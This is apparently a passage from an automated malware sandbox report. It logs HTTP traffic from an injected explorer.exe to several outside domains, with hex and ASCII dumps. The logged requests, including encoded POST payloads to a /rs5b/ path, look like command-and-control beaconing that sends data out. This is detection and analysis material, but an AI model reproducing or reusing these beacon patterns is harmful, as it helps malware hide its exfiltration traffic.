                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              10192.168.2.549706198.177.124.5780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:29.247456074 CET138OUTGET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.peramid.xyz
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:29.518753052 CET139INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:50:29 GMT
                                                                              Server: Apache
                                                                              Content-Length: 389
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              11192.168.2.54970745.114.105.280C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:34.817869902 CET140OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.locationsbormes.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.locationsbormes.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.locationsbormes.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 30 6c 4f 50 53 70 4b 5f 76 35 50 62 6b 37 28 30 67 52 4f 57 79 65 79 61 37 4f 67 44 79 65 59 63 57 6e 58 6f 56 43 35 53 76 72 76 68 4e 42 61 37 30 4c 4b 57 61 58 37 7a 32 63 78 32 31 69 42 77 59 52 35 53 4f 5f 72 70 36 58 71 50 68 4e 43 7a 69 6e 50 41 6f 56 45 61 52 41 49 77 59 2d 42 54 34 41 79 42 64 72 39 66 6a 6a 54 52 50 65 6d 78 55 48 7e 6f 4e 47 4b 37 5a 49 77 62 52 68 51 30 7e 79 61 61 42 5f 77 76 41 32 67 71 42 65 34 77 66 6a 70 74 7e 45 63 31 6d 34 59 58 4b 4c 74 50 39 38 79 55 50 75 57 4e 72 55 7a 52 45 53 56 33 74 41 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
                                                                              Mar 20, 2023 16:50:35.249516010 CET141INHTTP/1.1 400 Bad Request
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:35 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 31 66 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 09 62 6f 64 79 7b 0d 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0d 0a 09 7d 0d 0a 09 68 33 7b 0d 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0d 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0d 0a 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 30 70 78 3b 0d 0a 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 09 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 33 3e 34 30 34 ef bc 8c e6 82 a8 e8 af b7 e6 b1 82 e7 9a 84 e6 96 87 e4 bb b6 e4 b8 8d e5 ad 98 e5 9c a8 21 3c 2f 68 33 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1f7<!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              12192.168.2.54970845.114.105.280C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:50:38.678186893 CET142OUTGET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.locationsbormes.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:50:38.929861069 CET142INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 20 Mar 2023 15:50:38 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 1.0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.54969866.96.161.15880C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:49:50.047743082 CET111OUTGET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1
                                                                              Host: www.drkathleensanders.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 20, 2023 16:49:50.166798115 CET112INHTTP/1.1 404 Not Found
                                                                              Date: Mon, 20 Mar 2023 15:49:50 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 867
                                                                              Connection: close
                                                                              Server: Apache/2
                                                                              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                              Accept-Ranges: bytes
                                                                              Age: 0
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.549699206.54.190.3080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 20, 2023 16:49:55.363253117 CET114OUTPOST /rs5b/ HTTP/1.1
                                                                              Host: www.carcosainvest.com
                                                                              Connection: close
                                                                              Content-Length: 187
                                                                              Cache-Control: no-cache
                                                                              Origin: http://www.carcosainvest.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://www.carcosainvest.com/rs5b/
                                                                              Accept-Language: en-US
                                                                              Accept-Encoding: gzip, deflate
                                                                              Data Raw: 75 79 78 76 67 3d 71 4d 38 79 7a 57 54 77 55 4a 41 42 4c 39 4a 59 6b 2d 38 44 5a 34 4d 5f 54 66 79 45 38 38 7e 44 37 73 37 4e 7e 45 63 5a 58 6b 58 6b 70 33 31 6c 7e 4c 35 76 55 39 64 7a 4b 4b 41 51 70 70 42 45 49 54 72 35 65 54 41 50 54 72 30 35 67 44 32 4d 76 62 49 37 72 41 57 43 6f 4a 6a 69 55 2d 38 52 54 4f 4d 4c 7e 34 57 53 4e 4a 73 7a 71 75 6c 30 48 4c 65 6f 33 5f 43 51 66 69 28 51 63 73 35 7a 70 58 59 49 37 77 79 46 77 4a 72 64 65 71 28 53 32 61 57 5f 77 56 63 71 36 38 46 77 45 46 57 4e 67 67 52 5f 65 54 6a 64 6c 56 39 4d 79 6e 47 50 49 67 29 2e 00 00 00 00 00 00 00 00
                                                                              Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
                                                                              Mar 20, 2023 16:49:55.599078894 CET115INHTTP/1.1 404 Not Found
                                                                              Connection: close
                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                              content-type: text/html; charset=UTF-8
                                                                              link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/"
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Mon, 20 Mar 2023 15:49:55 GMT
                                                                              server: LiteSpeed
                                                                              Data Raw: 31 32 30 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 77 db b6 b2 7e b6 7f 05 4c af d8 62 0b 52 24 75 35 15 3a a7 3b 6d 9f da dd ae 5e 1e ce 4a 72 bc 20 12 94 90 90 04 37 00 5d 7c 54 ff f7 bd 00 90 e2 45 94 e5 ca a9 bd e2 88 c0 cc 37 83 c1 60 00 cc 50 17 6f af be ff e5 fd 1f ff fb eb 0f 60 29 d2 e4 fe f2 e2 ad fc 1f 24 28 5b 04 06 ce ac 3f 7f 37 54 23 46 d1 fd e5 c5 c5 db 14 0b 04 c2 25 62 1c 8b c0 f8 f3 8f 1f ad a9 01 fa 55 57 86 52 1c 18 6b 82 37 39 65 c2 00 21 cd 04 ce 44 60 6c 48 24 96 41 84 d7 24 c4 96 7a 80 80 64 44 10 94 58 3c 44 09 0e 5c 29 e9 e2 6d 42 b2 2f 80 e1 24 30 72 46 63 92 60 03 2c 19 8e 03 63 29 44 ce fd 7e 7f 91 e6 0b 9b b2 45 7f 1b 67 7d b7 e0 12 44 24 f8 fe 57 b4 c0 20 a3 02 c4 74 95 45 e0 e6 7a ea b9 ee 0c bc 47 2c a4 1c 91 6c 8d b9 78 db d7 b4 97 7a 2c 4a e1 5b 46 e7 54 f0 db bd ba b7 29 da 5a 24 45 0b 6c e5 0c cb e1 f8 09 62 0b 7c 2b c7 5a a9 78 1b 65 5c 12 c4 58 84 cb 5b ad e7 6d bf 1f d6 e5 d9 21 4d 5b 6c 06 4a 04 66 19 12 d8 00 e2 31 c7 81 81 f2 3c 21 21 12 84 66 7d c6 f9 b7 db 34 31 80 d2 33 30 1a da 83 1b 86 fe b3 a2 33 f0 23 c6 51 db 32 07 72 fb 31 c6 51 5f 4d 50 a5 f4 d7 90 fe 9e a6 29 ce 04 7f a1 1a 61 41 5e d7 87 87 8c e4 e2 fe 72 8d 18 c8 d1 02 27 e8 11 b3 07 f4 19 6d 57 2c 01 01 d8 cf f7 e1 a8 36 b9 85 a2 94 64 7d f5 d7 92 3c 76 be cc df 19 b3 16 da 22 a1 73 94 3c 64 34 0b b1 84 1c df c5 6e 3c 89 dc d0 3b 20 e5 98 ad 31 7b 10 24 95 94 ee 78 72 37 f0 26 83 bb 51 1b 92 f0 87 84 ac 15 da 01 46 8c 42 3c a7 f4 cb 03 89 a4 b4 83 7e 8e 85 20 d9 82 83 00 ec 8c 9c 72 f1 20 67 9f 1b fe 07 f5 64 40 43 1a c2 f8 04 0d 9c a1 79 82 1f 16 64 8d 99 e1 1b ae 01 8d 14 6d 1f d4 ba 31 7c d7 9d 38 d0 10 92 44 3c cc 19 46 5f 72 4a 32 61 f8 93 f1 14 1a 29 9d 93 04 37 da 07 63 07 1a 9c 44 78 8e 98 e1 c7 28 e1 18 1a 73 1a 3d 3e c4 54 f2 19 06 34 42 9a d0 b2 f3 a9 3d 6a 86 43 94 8b 70 f9 20 03 43 31 b6 b7 fd 62 0a df 72 f1 98 60 40 a2 c0 c8 69 be 4a 10 8b b7 96 36 bd a5 ba 78 e9 e6 02 6f 45 3f e4 dc b8 bf b4 39 11 d8 5a 62 14 61 06 76 73 14 7e 59 30 b9 68 2d a5 87 7f 1d ab 9f 2b 92 ca 38 82 32 31 7b 2a 58 d4 aa 00 08 ec 0a 42 77 22 7f 9f 23 04 72 90 16 27 ff 8f 7d 30 70 40 be 9d 81 12 2c c2 7a 0c 84 66 2d 40 d0 81 d8 a0 ae 81 ba a3 7c bb d7 2f a6 54 74 0f a9 d0 14 d4 c7 74 f9 b6 af 4c 74 5f 5b 9f 39 c3 09 45 07 ab 5b 0a e4 f6 82 d2 45 82 51 4e b8 0c 2c d2 98 ef 62 94 92 e4 31 f8 95 e6 39 c9 f8 9b c1 77 43 c7 79 33 79 ff b3 a4 c7 8c 21 a1 9b 0c 80 78 60 a8 50 65 80 90 51 ce 29 23 0b 92 05 06 ca 68 f6 98 d2 15 37 ea 6a d4 63 5b 3b d2 14 ba 70 81 04 09 a5 22 46 3d 2c 1a 39 c3 21 cd 32 1c 8a d3 8c c7 55 a9 b9 55 19 1f ac 0d dd 58 28 23 a9 0a 95 da bb 0e 9d cb de c7 13 49 bf 5b 13 4e e6 24 21 e2 d1 07 4b 12 45 38 9b 3d 95 66 bf bc a8 7b ef 5e cc 29 ef f5 19 a5 62 67
                                                                              Data Ascii: 120d[[w~LbR$u5:;m^Jr 7]|TE7`Po`)$([?7T#F%bUWRk79e!D`lH$A$zdDX<D\)mB/$0rFc`,c)D~Eg}D$W tEzG,lxz,J[FT)Z$Elb|+Zxe\X[m!M[lJf1<!!f}41303#Q2r1Q_MP)aA^r'mW,6d}<v"s<d4n<; 1{$xr7&QFB<~ r gd@Cydm1|8D<F_rJ2a)7cDx(s=>T4B=jCp C1br`@iJ6xoE?9Zbavs~Y0h-+821{*XBw"#r'}0p@,zf-@|/TttLt_[9E[EQN,b19wCy3y!x`PeQ)#h7jc[;p"F=,9!2UUX(#I[N$!KE8=f{^)bg
                                                                              Mar 20, 2023 16:49:55.599138021 CET116INData Raw: 59 95 20 e5 8d 56 ce 48 8a d8 a3 7f ed 38 93 79 1c cf 0e 29 b8 b4 4c a4 68 c6 e1 64 34 89 3a 68 e4 32 f1 af dd 48 fe 76 74 a3 30 c4 99 f0 af c7 6e 88 27 4e 83 40 39 65 a1 84 a5 1e b4 73 f8 bf e4 38 03 bf a3 8c 1f 92 ef 35 6a 30 fc 26 77 44 7a 48
                                                                              Data Ascii: Y VH8y)Lhd4:h2Hvt0n'N@9es85j0&wDzH-ukVnvH5m^*Ke<F7LZAwI3n.Uc!$d<Q!ElA2+cbY=]O#@/%Y1[swyqqQ$"<A~F3\1RW*N|kE{L^&
                                                                              Mar 20, 2023 16:49:55.599172115 CET118INData Raw: a3 31 1c 8d a7 de 18 ee 3f bb 77 9f 60 a3 67 ea 39 83 46 b7 79 73 53 e3 9e 0c 06 1e 1c 8d 5d 6f 0a 47 e3 a1 37 a8 3e bb b2 a5 6c 77 ab cf 03 a7 fa 5c a7 1f 4e 2a c9 0a 55 4b de 43 0c e4 40 9b f8 cd 06 cf 6d 51 0c 9c 56 83 d7 c6 18 4e 3e 99 33 65
                                                                              Data Ascii: 1?w`g9FysS]oG7>lw\N*UKC@mQVN>3e"hd2w#mc4ML$$1<'=xviAHY~pW*%X3!jJU/?Q\PL~|D%cSm4^i'lE?q&~"\`NV[U|
                                                                              Mar 20, 2023 16:49:55.599205971 CET119INData Raw: e9 8f 24 94 d1 8f f3 e7 a5 3b 9e f2 18 d7 9b 56 d2 dd 01 94 93 ed 7a 27 dd 28 25 51 a6 0b b8 cf 8d 10 aa 8b e8 1e 7f e8 40 d7 1d 43 6f 74 64 f6 a2 15 15 34 c3 96 15 21 f6 45 6d e7 ea 35 36 1f ac 58 d2 bb bd de e4 56 49 d1 24 b8 6d c7 ec 92 ec 59
                                                                              Data Ascii: $;Vz'(%Q@Cotd4!Em56XVI$mYy\Pq0dA:\Yz-p&*@HFw8lA{/ZOQN]#v=BUR` KGVA6xB-,s|!iiO2P$3$C3#o
                                                                              Mar 20, 2023 16:49:55.616341114 CET120INData Raw: 64 38 39 0d 0a ec 5d 6d 8f db 36 12 fe ec 00 fd 0f 84 82 45 9b a2 92 25 d9 f2 bb 05 34 b9 6b ae 1f ee 2e 48 da 3b 1c 0e 87 40 96 69 af 5c d9 52 25 f9 65 b3 e8 7f 3f cc 90 14 29 59 92 b5 4e b6 b8 eb 6e 3e 6c 76 29 72 48 0e 87 43 72 38 7c 46 3e 84
